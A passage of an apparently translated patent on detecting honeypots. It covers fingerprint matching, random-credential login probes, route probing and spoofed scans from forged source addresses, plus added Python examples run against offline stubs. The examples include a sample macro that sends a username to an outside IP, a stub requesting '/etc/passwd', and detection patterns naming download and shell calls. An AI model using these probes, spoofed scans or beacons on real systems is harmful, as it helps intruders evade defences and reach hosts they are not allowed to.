For example, as shown in table 2, the honeypot identification plug-in that matches the mySQL service may include a first target honeypot identification plug-in and a second target honeypot identification plug-in, each honeypot identification plug-in corresponding to an interaction policy. The interaction strategy of the first target honeypot identification plug-in is 'login for a plurality of times by using randomly generated account numbers and passwords', and the interaction strategy of the second target honeypot identification plug-in is 'login for a single time by using randomly generated account numbers and passwords'. Therefore, the first device can interact with the target port according to the corresponding interaction strategies through the first target honeypot identification plug-in and the second target honeypot identification plug-in.
Or only one target honeypot identification plug-in matched with the target port exists, and the target honeypot identification plug-in corresponds to multiple interaction strategies. For example, the honeypot identification plug-in matched with the mySQL service is a third target honeypot identification plug-in, the third target honeypot identification plug-in corresponds to two interaction strategies, the two interaction strategies are respectively a first interaction strategy and a second interaction strategy, the first interaction strategy is that multiple logins are performed on a port by using a randomly generated account and a randomly generated password, and the second interaction strategy is that one login is performed on the port by using a randomly generated account and a randomly generated password. In this way, the first device may interact with the target port according to the first interaction policy and the second interaction policy, which correspond to the third target honeypot identification plug-in.
Different interaction strategies correspond to different interaction results, the same interaction strategy corresponds to the same interaction result, but the honeypot identification modes corresponding to the same interaction strategy may be different.
As an example, the honeypot identification plug-in matching the MySQL service is the third target honeypot identification plug-in, and its first interaction strategy is "log in to the port multiple times using randomly generated account names and passwords". The first interaction strategy corresponds to two honeypot identification modes. In the first mode, if the interaction result is that every one of the multiple logins succeeded, a honeypot exists in the target (a real server does not accept random credentials). In the second mode, if the salt in the multiple interaction results is the same, a honeypot exists in the target: a real MySQL server generates a fresh random authentication scramble (the "salt" in its initial handshake packet) for every connection, whereas a simple honeypot may reply with a hard-coded one. That is, the honeypot identification modes corresponding to the same interaction strategy differ.
The second interaction strategy corresponding to the third target honeypot identification plug-in is "log in to the port once using a randomly generated account name and password", and the honeypot identification mode corresponding to it may be: a honeypot exists in the target if the login succeeds and a field of the form "LOAD DATA LOCAL INFILE 'xxx' INTO TABLE ... FIELDS TERMINATED BY '\n'" exists in the interaction result. A server that issues a LOAD DATA LOCAL INFILE request to a client that has just logged in is asking that client to upload one of its local files, which is the behaviour of a honeypot or rogue MySQL server harvesting files from whoever connects, not of a production database.
It should be noted that, because the first device is provided with a plurality of honeypot identification plug-ins, each honeypot identification plug-in corresponds to one or more interaction strategies, the first device can identify honeypots of different types according to the one or more interaction strategies of each honeypot identification plug-in of the plurality of honeypot identification plug-ins, that is, the first device can identify honeypots of more types.
In addition, the greater the number of honeypot identification plug-ins installed in the first device, the greater the number of interaction strategies corresponding to each honeypot identification plug-in, and the greater the types of honeypots that can be identified by the first device.
The interaction strategy corresponding to the target honeypot identification plug-in is a target interaction strategy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction strategy. Before the first device determines that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the first device can interact with the target port through the target honeypot identification plug-in according to a target interaction strategy to obtain the interaction result of the target honeypot identification plug-in and the target port. Then, the first device may first determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that the target port provides honeypot simulation service, and determine that honeypots exist in the target.
Wherein the preset condition comprises any one of the following conditions:
(1) a first preset field exists in the interaction result;
(2) under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the randomly generated account and the password, the target port is logged in for multiple times successfully;
(3) and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
For example, the first device determines whether the interaction result meets the preset condition according to the honeypot identification mode corresponding to the target interaction policy.
For example, as shown in table 2, if the target port number is 3306, the target service corresponding to the target port is the MySQL service. If the interaction strategy corresponding to the MySQL service is "log in to the port once using a randomly generated account name and password", the first device interacts with the target port according to that strategy, and if a field of the form "LOAD DATA LOCAL INFILE 'xxx' INTO TABLE ... FIELDS TERMINATED BY '\n'" exists in the interaction result, it determines that a honeypot exists in the target.
Or, if the interaction policy corresponding to the mySQL service is "multiple logins to the port by using a randomly generated account and password", the first device interacts with the target port according to the interaction policy. And if the interaction result is that the ports are logged in for multiple times successfully, determining that the honeypots exist in the target.
For example, an HTTP or HTTPS service may be bound to any port number from 1 to 65535, so the corresponding plug-in is not tied to a particular port. If the interaction strategy corresponding to the HTTP or HTTPS service is "request the target port multiple times with different routes", the first device interacts with the target port according to that strategy, and if the interaction result is that the hash values of the responses returned for the different routes are the same, it determines that a honeypot exists in the target: a simple web honeypot serves the same canned page for every route, whereas a real web application returns different content for different paths. A real site whose front controller returns one page for every path (a single-page application, for example) produces the same signal, so on its own this condition is a weaker indicator than the login-based ones.
As an example, the first device may also determine the target honeypot identification plug-in matching the target port from the port number of the target port. For example, as shown in table 2, for a target port with any port number from 1 to 65535, the honeypot identification plug-in whose interaction strategy is "request the target port multiple times with different routes" may be selected from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in, or the plug-in whose interaction strategy is "perform a TCP three-way handshake with the port" may be selected as the target honeypot identification plug-in.
As an example, the first device may also determine the target honeypot identification plug-in matching the target port from the scan response obtained from the target port in step 102. For example, as shown in table 2, if a "GPON" field is present in the scan response, the honeypot identification plug-in whose interaction strategy is "request the target port multiple times with arbitrary routes" is selected from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
In addition, the first device may also determine the kind (type) of honeypots present in the target through a honeypot identification plug-in. For example, the kind of honeypot is determined according to the port number and the interaction policy.
As an example, as shown in table 2, the first device determines that the target port number is 3306 and the interaction strategy is to log in to the port multiple times using randomly generated account names and passwords. If the interaction result is that all of the multiple logins succeeded, it may determine not only that a honeypot exists in the target but also that the honeypot is a MySQL weak-password honeypot.
It should be noted that table 2 is only an example of honeypot identification plug-ins for identifying honeypots and does not limit them. More honeypot identification plug-ins may be installed in the first device, and the plug-in use conditions, honeypot identification modes, port numbers and identifiable honeypots of the plug-ins may differ; the embodiment of the present application does not limit the honeypot identification plug-ins.
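The plug-in selection and the three preset conditions of step 104, as an added example that is not part of the patent: the plug-in is chosen by target service, the two interaction strategies from table 2 run against in-memory stubs standing in for the target port (a weak-password MySQL-style honeypot, an ordinary server, a canned-page web honeypot and an ordinary web server, all constructed for this example), and the honeypot identification modes are applied to the interaction result. The stub behaviour, the function names and the LOAD DATA LOCAL INFILE text are assumptions.

```python
import hashlib
import random
import re
import secrets
import string
from typing import Callable

# --- Stubs standing in for the target port (constructed for this example) -------------------
# A real plug-in would open SSH/FTP/Telnet/MySQL or HTTP(S) connections to the target;
# each stub returns what the plug-in would observe from one interaction.

def honeypot_login(user: str, password: str) -> dict:
    """Weak-password MySQL-style honeypot: accepts anything, fixed salt, asks for a client file."""
    return {"ok": True, "salt": "a1b2c3d4e5f6a7b8c9d0",
            "server_text": "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE t FIELDS TERMINATED BY '\\n'"}


def real_login(user: str, password: str) -> dict:
    """Ordinary server: one valid account and a fresh random scramble per connection."""
    ok = (user, password) == ("admin", "correct horse battery staple")
    return {"ok": ok, "salt": secrets.token_hex(10), "server_text": "" if ok else "Access denied"}


def honeypot_fetch(path: str) -> bytes:
    """Web honeypot: the same canned login page for every route."""
    return b"<html><title>Login</title><form action=/login>...</form></html>"


def real_fetch(path: str) -> bytes:
    """Ordinary web server: unknown routes get a 404 page that mentions the path."""
    return b"<html><h1>404 Not Found</h1><p>" + path.encode() + b"</p></html>"


# --- Interaction strategies and their honeypot identification modes --------------------------

def random_credential(rng: random.Random, n: int = 12) -> str:
    return "".join(rng.choices(string.ascii_letters + string.digits, k=n))


def strategy_multi_login(login: Callable[[str, str], dict], rng: random.Random, attempts: int = 5) -> list:
    """Log in several times with random credentials; the list of results is the interaction result."""
    return [login(random_credential(rng), random_credential(rng)) for _ in range(attempts)]


def identify_from_logins(results: list) -> list:
    """Apply preset conditions (1) and (2) and the identical-salt mode to a login interaction result."""
    reasons = []
    if results and all(r["ok"] for r in results):
        reasons.append("all random-credential logins succeeded")          # preset condition (2)
    salts = {r["salt"] for r in results if r.get("salt")}
    if len(results) > 1 and len(salts) == 1:
        reasons.append("identical salt across connections")               # second mode in the text
    if any(re.search(r"LOAD DATA LOCAL INFILE", r.get("server_text", ""), re.I) for r in results):
        reasons.append("server issued LOAD DATA LOCAL INFILE")             # preset condition (1)
    return reasons


def strategy_distinct_routes(fetch: Callable[[str], bytes], rng: random.Random, attempts: int = 5) -> list:
    """Request several random, distinct routes; the list of response hashes is the interaction result."""
    routes = ["/" + random_credential(rng, 8) for _ in range(attempts)]
    return [hashlib.sha256(fetch(r)).hexdigest() for r in routes]


def identify_from_routes(hashes: list) -> list:
    """Apply preset condition (3): the same response for every route."""
    if len(hashes) > 1 and len(set(hashes)) == 1:
        return ["identical response for every route"]
    return []


LOGIN_SERVICES = {"ssh", "ftp", "telnet", "mysql"}
WEB_SERVICES = {"http", "https"}


def run_plugin(service: str, login=None, fetch=None, seed: int = 0) -> dict:
    """Select the plug-in by target service, interact, and apply the preset conditions.

    honeypot=False means "no condition met"; as the text says, that is not proof of absence.
    """
    rng = random.Random(seed)
    if service in LOGIN_SERVICES:
        reasons = identify_from_logins(strategy_multi_login(login, rng))
    elif service in WEB_SERVICES:
        reasons = identify_from_routes(strategy_distinct_routes(fetch, rng))
    else:
        raise ValueError("no honeypot identification plug-in matches service %r" % service)
    return {"service": service, "honeypot": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    print(run_plugin("mysql", login=honeypot_login, seed=1))
    print(run_plugin("http", fetch=real_fetch, seed=1))
```

Against a live target the login stub would be replaced by a client that records the server's handshake scramble and any LOAD DATA LOCAL request, and the fetch stub by an HTTP client; the identification functions stay the same.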
The honeypot identification plug-in identifies honeypots in an interactive mode with the ports, so that the first device can identify high-interaction honeypots through the honeypot identification plug-in. In addition, because various honeypot identification plug-ins are installed in the first equipment, and each honeypot identification plug-in corresponds to one or more interaction strategies, the first equipment can identify different types of honeypots through the one or more interaction strategies of each honeypot identification plug-in the various honeypot identification plug-ins, namely the first equipment can identify more types of honeypots, has better universality and meets the diversity of honeypots in network security.
In addition, when the first device does not find a target honeypot identification plug-in matching the target port among the plurality of plug-ins, or the interaction result does not meet the preset condition, it cannot conclude that the service provided by the target port is not a honeypot simulation service, that is, it cannot conclude that no honeypot exists in the target to be identified. In this case, more kinds of honeypot can be identified by installing additional honeypot identification plug-ins in the first device, by adding interaction strategies to an existing plug-in, or by other means.
For example, the first device may also determine that honeypots exist in the target according to the following two methods.
The first method: download a file from the target, extract the macro code of the file, and if the macro code shows that the file is a honeytoken, determine that a honeypot exists in the target.
The file downloaded from the target may be a Word document, a PDF, an Excel workbook or the like.
A honeytoken here is a file that carries a URL (Uniform Resource Locator). When a hidden link exists in the file, the link is triggered automatically when the first device downloads and opens the file, and the target to be identified can then obtain information such as the IP address of the first device. For this reason the macro code should be extracted and inspected statically, without opening the file in an office application, or the file should be opened only in an isolated environment without network access.
For example, the first device may extract the macro code from the downloaded file with oledump.py (olevba from oletools serves the same purpose), and then determine whether the macro code contains code for illegal operations. If so, it determines that the file is a honeytoken, and thus that a honeypot exists in the target.
The code for illegal operations may include code that obtains host privileges, code that makes unauthorised outbound network connections, and the like.
The second method comprises the following steps: and determining the running process in the target, and if the process name of the running process is determined to have the second preset field, determining that the honeypot exists in the target.
The second preset field may include one or more of decept-agent, HpfClient and heartbeat.
A honeypot includes a honeypot agent component. The first device may determine that a honeypot exists in the target by determining whether a process running the honeypot agent is present in the target.
For example, the first device may deploy a process-enumeration script in the target, obtain the running processes in the target with it, and determine whether the process name of any running process contains the second preset field. If it does, the first device determines that a honeypot exists in the target.
As an example, if the first device determines that the process name of a running process contains decept-agent, it determines that the honeypot agent of the Ehoney honeypot is installed in the target. If the process name contains HpfClient, it determines that the honeypot agent of the "magic" honeypot is installed in the target. If the process name contains heartbeat, it determines that the honeypot agent of the Antian honeypot is installed in the target. Because heartbeat is also the name of ordinary software (Elastic's Heartbeat monitoring agent, for one), a match on this field should be confirmed from the executable path or command line before it is treated as a honeypot indicator.
For example, the first device may deploy the process-enumeration script in the target after gaining access to the target.
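The two host-side methods as code, as an added example that is not part of the patent: a static scan of extracted macro code for the illegal operations the text names (with a constructed VBA sample standing in for oledump.py/olevba output), and the process-name check for the second preset field over constructed ps output. The indicator patterns, the sample macro, the process listing and the confirmation flag on heartbeat are assumptions of the example.

```python
import re
from typing import Dict, List

# Constructed VBA, standing in for what oledump.py / olevba extracts from a downloaded document.
SAMPLE_HONEYTOKEN_MACRO = """\
Sub AutoOpen()
    Dim req As Object
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "GET", "http://203.0.113.7/t?u=" & Environ("USERNAME"), False
    req.Send
End Sub
"""

SAMPLE_BENIGN_MACRO = """\
Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
    MsgBox "Report formatted"
End Sub
"""

# The "illegal operation" categories the text names, plus the auto-run hooks that fire them on open.
MACRO_INDICATORS = {
    "auto-run on open": re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    "outbound network connection": re.compile(
        r"\b(XMLHTTP|WinHttpRequest|URLDownloadToFile|InternetOpen)\b|https?://", re.I),
    "host command / privilege use": re.compile(
        r"\b(Shell|ShellExecute|WScript\.Shell|powershell|cmd\.exe)\b", re.I),
    "host information gathering": re.compile(r"\bEnviron\s*\(|\bComputerName\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'&]+")


def scan_macro(vba: str) -> Dict[str, List[int]]:
    """Map each indicator to the 1-based line numbers of the macro where it appears."""
    hits: Dict[str, List[int]] = {}
    for no, line in enumerate(vba.splitlines(), 1):
        for label, rx in MACRO_INDICATORS.items():
            if rx.search(line):
                hits.setdefault(label, []).append(no)
    return hits


def extract_urls(vba: str) -> List[str]:
    """The hidden links a honeytoken would beacon to (inspected, never opened)."""
    return URL_RE.findall(vba)


def is_honeytoken(vba: str) -> bool:
    """The page's rule: a network call-out or host privilege use in the macro marks a honeytoken."""
    hits = scan_macro(vba)
    return "outbound network connection" in hits or "host command / privilege use" in hits


# --- Second method: honeypot agent processes ------------------------------------------------

# Second preset field -> honeypot, as listed in the text. "heartbeat" also belongs to ordinary
# software, so it is flagged as needing confirmation from the command line.
AGENT_PROCESS_FIELDS = {
    "decept-agent": ("Ehoney", False),
    "hpfclient": ("magic honeypot", False),
    "heartbeat": ("Antian honeypot", True),
}

# Constructed `ps -eo pid,comm,args` output, as a process-enumeration script would return it.
SAMPLE_PS_OUTPUT = """\
  PID COMMAND         COMMAND
    1 systemd         /sbin/init
  812 sshd            /usr/sbin/sshd -D
 1044 decept-agent    /opt/ehoney/decept-agent -c /opt/ehoney/agent.yml
 1310 heartbeat       /usr/share/heartbeat/bin/heartbeat -e -c /etc/heartbeat/heartbeat.yml
"""


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Parse pid / comm / args columns, skipping the header line."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs.append({"pid": parts[0], "name": parts[1], "args": parts[2]})
    return procs


def find_agent_processes(procs: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Processes whose name contains a second preset field (case-insensitive substring match)."""
    found = []
    for p in procs:
        for field, (honeypot, needs_confirmation) in AGENT_PROCESS_FIELDS.items():
            if field in p["name"].lower():
                found.append({"pid": p["pid"], "name": p["name"], "field": field, "honeypot": honeypot,
                              "confirm_from_args": needs_confirmation, "args": p["args"]})
    return found


if __name__ == "__main__":
    print(scan_macro(SAMPLE_HONEYTOKEN_MACRO), extract_urls(SAMPLE_HONEYTOKEN_MACRO))
    for hit in find_agent_processes(parse_ps(SAMPLE_PS_OUTPUT)):
        print(hit)
```

In the constructed listing the heartbeat hit runs from /usr/share/heartbeat/bin with an /etc/heartbeat/heartbeat.yml config, which is the layout of Elastic's Heartbeat package; an analyst would dismiss it and keep only the decept-agent hit.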
In the embodiment of the application, for the target to be identified, a scanning request is sent to the target port of the target, and then a scanning response from the target port is obtained. And then determining that the honeypot exists in the target if the field in the scanning response is matched with any characteristic fingerprint in the honeypot fingerprint library. And if the field in the scanning response is determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. The honeypots in the target can be identified by matching the scanning response of the target port with the characteristic fingerprints of the honeypot fingerprint library, and the honeypots in the target can also be identified by the interaction result of the target honeypot identification plug-in and the target port, so that the honeypots which can be identified are more in types and better in universality, and the diversity of the honeypots in network security is met.
Referring to fig. 2, fig. 2 is a schematic structural diagram of a honeypot identification apparatus according to an embodiment of the present application. The honeypot identification apparatus can be implemented by software, hardware or a combination of the two as part or all of a computer device, which can be the computer device shown in fig. 3 below. As shown in fig. 2, the apparatus includes a sending module 201, an obtaining module 202, a first determining module 203, and a second determining module 204.
In this embodiment of the present application, the sending module 201 is configured to send, to a target port of a target, a scanning request for the target to be identified;
an obtaining module 202, configured to obtain a scan response from a target port;
the first determination module 203 is used for determining that the honeypots exist in the target if the fields in the scanning response are determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and a second determining module 204, configured to determine, if it is determined that the field in the scan response is not matched with all the feature fingerprints in the honeypot fingerprint library, a target honeypot identification plug-in that is matched with the target port, determine, according to an interaction result of the target honeypot identification plug-in and the target port, that a honeypot exists in the target, where the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
the apparatus further comprises an interaction module:
the interaction module is used for interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the second determining module 204 is further configured to determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that the honeypot exists in the target.
As one example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the randomly generated account and the password, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As an example, the second determining module 204 is further configured to determine a target service provided by the target port;
and determining the honeypot identification plug-in matched with the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the second determining module 204 is further configured to, if the target service includes an SSH, FTP, Telnet or MySQL service, select from the plurality of honeypot identification plug-ins the plug-in whose corresponding interaction strategy is to log in to the target port multiple times using randomly generated account names and passwords as the target honeypot identification plug-in;
the second determining module 204 is further configured to, if the target service includes an HTTP or HTTPS service, select the plug-in whose corresponding interaction strategy is to request the target port multiple times with different routes as the target honeypot identification plug-in.
As an example, the sending module 201 is further configured to generate at least one forged source device address from the source device address of the first device;
construct a plurality of scanning requests from the source device address and the at least one forged source device address, wherein the plurality of scanning requests comprise at least a first scanning request and a second scanning request, the first scanning request being sent from the source device address and the second scanning request being sent from any one of the at least one forged source device address;
and send the plurality of scanning requests to the target port to perform a spoofed scan of the target port.
As one example, the apparatus further comprises a third determining module or a fourth determining module:
the third determining module is configured to download a file from the target, extract the macro code of the file, and, if it is determined from the macro code that a honey token exists in the target, determine that a honeypot exists in the target;
and the fourth determining module is configured to determine the running processes in the target and, if it is determined that the process name of a running process contains a second preset field, determine that a honeypot exists in the target.
It should be noted that: the honeypot identification apparatus provided in the above embodiment is only illustrated by dividing the functional modules, and in practical applications, the functions may be distributed by different functional modules according to needs, that is, the internal structure of the apparatus is divided into different functional modules to complete all or part of the functions described above.
Each functional unit and module in the above embodiments may be integrated into one processing unit, or each unit may exist alone physically, or two or more units are integrated into one unit, and the integrated unit may be implemented in a form of hardware, or in a form of software functional unit. In addition, specific names of the functional units and modules are only used for distinguishing one functional unit from another, and are not used for limiting the protection scope of the embodiments of the present application.
The embodiment of the honeypot identification apparatus and the embodiment of the honeypot identification method provided by the above embodiment belong to the same concept, and for specific working processes of units and modules and technical effects brought by the working processes in the above embodiments, reference may be made to the part of the embodiment of the method, and details are not described here.
Referring to fig. 3, fig. 3 is a schematic structural diagram of a computer device according to an embodiment of the present disclosure. As shown in fig. 3, the computer device includes a processor 301, a memory 302 and a computer program 303 stored in the memory 302 and executable on the processor 301; the steps of the honeypot identification method in the above embodiments are implemented when the computer program 303 is executed by the processor 301.
The computer device may be the first device or the second device in the embodiment of fig. 1, and may be a general-purpose computer device or a special-purpose computer device. In a specific implementation, the computer device may be a terminal or a server, and the terminal may be a mobile phone, a desktop computer, a laptop computer, a palmtop computer, a tablet computer, a wireless terminal device, a communication device, and the like. Those skilled in the art will appreciate that fig. 3 is merely an example of a computer device and is not intended to limit it; the computer device may include more or fewer components than those shown, combine some components, or have different components, such as input/output devices, network access devices, etc.
The processor 301 may be a Central Processing Unit (CPU), and may also be another general-purpose processor, a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), a Field Programmable Gate Array (FPGA) or other programmable logic device, discrete gate or transistor logic, discrete hardware components, etc. A general-purpose processor may be a microprocessor or any conventional processor.
The memory 302 may, in some embodiments, be an internal storage unit of the computer device, such as a hard disk or memory of the computer device. In other embodiments the memory 302 may also be an external storage device of the computer device, such as a plug-in hard disk, a Smart Media Card (SMC), a Secure Digital (SD) card, a Flash Card, etc. provided on the computer device. Further, the memory 302 may include both an internal storage unit of the computer device and an external storage device. The memory 302 is used to store an operating system, application programs, a boot loader, data, and other programs. The memory 302 may also be used to temporarily store data that has been output or is to be output.
An embodiment of the present application further provides a computer device, where the computer device includes: at least one processor, a memory, and a computer program stored in the memory and executable on the at least one processor, the processor implementing the steps of any of the various method embodiments described above when executing the computer program.
The embodiments of the present application also provide a computer-readable storage medium, where a computer program is stored, and when the computer program is executed by a processor, the steps in the above-mentioned method embodiments can be implemented.
The embodiments of the present application provide a computer program product, which when run on a computer causes the computer to perform the steps of the above-described method embodiments.
The integrated unit, if implemented in the form of a software functional unit and sold or used as a stand-alone product, may be stored in a computer-readable storage medium. Based on such understanding, all or part of the processes in the above method embodiments may be implemented by a computer program, which may be stored in a computer-readable storage medium and executed by a processor to implement the steps of the above method embodiments. The computer program comprises computer program code, which may be in the form of source code, object code, an executable file or some intermediate form, etc. The computer-readable medium may include at least: any entity or apparatus capable of carrying computer program code to a photographing apparatus/terminal device, a recording medium, computer memory, ROM (Read-Only Memory), RAM (Random Access Memory), CD-ROM (Compact Disc Read-Only Memory), magnetic tape, floppy disk, optical data storage device, etc. The computer-readable storage medium referred to herein may be a non-volatile storage medium, in other words, a non-transitory storage medium.
It should be understood that all or part of the steps for implementing the above embodiments may be implemented by software, hardware, firmware or any combination thereof. When implemented in software, they may be implemented in whole or in part in the form of a computer program product. The computer program product includes one or more computer instructions. The computer instructions may be stored in the computer-readable storage medium described above.
In the above embodiments, the descriptions of the respective embodiments have respective emphasis, and reference may be made to the related descriptions of other embodiments for parts that are not described or illustrated in a certain embodiment.
Those of ordinary skill in the art will appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware or combinations of computer software and electronic hardware. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus/computer device and method may be implemented in other ways. For example, the above-described apparatus/computer device embodiments are merely illustrative: the division into modules or units is only a division by logical function, and other divisions are possible in practice; for example, multiple units or components may be combined or integrated into another system, or some features may be omitted or not implemented. In addition, the shown or discussed mutual coupling, direct coupling or communication connection may be an indirect coupling or communication connection through some interfaces, devices or units, and may be in an electrical, mechanical or other form.
Units described as separate parts may or may not be physically separate, and parts displayed as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of the embodiment.
The above-mentioned embodiments are only used for illustrating the technical solutions of the present application, and not for limiting the same; although the present application has been described in detail with reference to the foregoing embodiments, it should be understood by those of ordinary skill in the art that: the technical solutions described in the foregoing embodiments may still be modified, or some technical features may be equivalently replaced; such modifications and substitutions do not substantially depart from the spirit and scope of the embodiments of the present application and are intended to be included within the scope of the present application.

Claims (10)

1. A honeypot identification method, applied to a first device, the method comprising:
for a target to be identified, sending a scanning request to a target port of the target;
acquiring a scanning response from the target port;
if the field in the scanning response is determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, determining that a honeypot exists in the target, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, wherein the target honeypot identification plug-in is used for interacting with the target port.
2. The method of claim 1, wherein the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, the target honeypot identification plug-in being used for interacting with the target port according to the target interaction policy;
before determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the method further comprises the following steps:
interacting with the target port through the target honeypot identification plug-in according to the target interaction policy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port comprises:
determining whether the interaction result meets a preset condition;
and if the interaction result meets the preset condition, determining that the honeypots exist in the target.
3. The method of claim 2, wherein the preset condition comprises any one of the following conditions:
a first preset field exists in the interaction result;
when the target interaction policy is to log in to the target port multiple times using a randomly generated account and password, the multiple logins to the target port succeed;
and when the target interaction policy is to request different routes from the target port multiple times, the responses returned by the target port for the different routes are identical.
4. The method of claim 1, wherein the determining a target honeypot identification plug-in that matches the target port comprises:
determining a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
5. The method of claim 4, wherein each honeypot identification plug-in of the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the step of determining the honeypot identification plug-in matching the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in comprises any one of the following:
if the target service comprises an SSH service, an FTP service, a Telnet service or a MySQL service, determining, from the plurality of honeypot identification plug-ins, the honeypot identification plug-in whose corresponding interaction policy is to log in to the target port multiple times using a randomly generated account and password as the target honeypot identification plug-in;
and if the target service comprises an HTTP service and an HTTPS service, determining, from the plurality of honeypot identification plug-ins, the honeypot identification plug-in whose corresponding interaction policy is to request different routes from the target port multiple times as the target honeypot identification plug-in.
6. The method of any of claims 1-5, wherein sending the scan request to the target port comprises:
generating at least one forged source device address from the source device address of the first device;
constructing a plurality of scanning requests from the source device address and the at least one forged source device address, wherein the plurality of scanning requests comprise at least a first scanning request and a second scanning request, the first scanning request being sent from the source device address and the second scanning request being sent from any one of the at least one forged source device address;
and sending the plurality of scanning requests to the target port to perform a spoofed scan of the target port.
7. The method of any of claims 1-5, wherein the method further comprises:
downloading a file from the target, extracting the macro code of the file, and determining that a honeypot exists in the target if it is determined from the macro code that a honey token exists in the target;
or,
determining a running process in the target, and if it is determined that the process name of the running process contains a second preset field, determining that a honeypot exists in the target.
8. A honeypot identification apparatus, the apparatus comprising:
a sending module, configured to send a scan request to a target port of a target to be identified;
an acquisition module for acquiring a scan response from the target port;
a first determination module, configured to determine that a honeypot exists in the target if it is determined that the field in the scan response matches any one of the feature fingerprints in a honeypot fingerprint library, where the honeypot fingerprint library includes feature fingerprints of a plurality of honeypots;
and the second determination module is used for determining a target honeypot identification plug-in matched with the target port if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, and the target honeypot identification plug-in is used for interacting with the target port.
9. A computer device, characterized in that the computer device comprises a memory, a processor and a computer program stored in the memory and executable on the processor, which computer program, when executed by the processor, implements the method according to any of claims 1 to 7.
10. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program which, when executed by a processor, implements the method of any one of claims 1 to 7.
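The decision logic of claims 1 to 5 and of the apparatus embodiment above, as an added example that is not part of the patent: it runs entirely offline against constructed in-memory stand-ins for the target port (`SimulatedPort`, the fingerprint library, the service names and the "first preset field" value are all assumptions), so a honeypot operator can check whether the observed behaviour of their own deployment would be flagged by this two-stage method and harden it accordingly.

```python
import secrets
import string
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Constructed fingerprint library (not the patent's): honeypot name ->
# (field, substring) pairs that must all appear in the scan response.
FINGERPRINT_LIBRARY: Dict[str, List[Tuple[str, str]]] = {
    "example-ssh-honeypot": [("banner", "SSH-2.0-EXAMPLE-HONEY")],
    "example-web-honeypot": [("server", "ExampleTrap/1.0")],
}
FIRST_PRESET_FIELD = "X-Example-Trap"  # constructed stand-in for claim 3's "first preset field"


def match_fingerprint(scan_response: Dict[str, str], library=FINGERPRINT_LIBRARY) -> Optional[str]:
    """Stage 1 (claim 1): name of the first library entry whose every pattern
    is present in the scan response, or None when nothing matches."""
    for name, patterns in library.items():
        if all(sub in scan_response.get(fld, "") for fld, sub in patterns):
            return name
    return None


def select_policy(service: str) -> Optional[str]:
    """Claims 4-5: pick the plug-in's interaction policy from the service on the port."""
    service = service.lower()
    if service in {"ssh", "ftp", "telnet", "mysql"}:
        return "random_login"
    if service in {"http", "https"}:
        return "route_probe"
    return None


def random_credentials(n: int, length: int = 12) -> List[Tuple[str, str]]:
    """Fresh random account/password pairs; a real service rejects them all."""
    alphabet = string.ascii_letters + string.digits

    def token() -> str:
        return "".join(secrets.choice(alphabet) for _ in range(length))
    return [(token(), token()) for _ in range(n)]


@dataclass
class SimulatedPort:
    """In-memory stand-in for the target port so the logic runs offline."""
    login: Callable[[str, str], bool]
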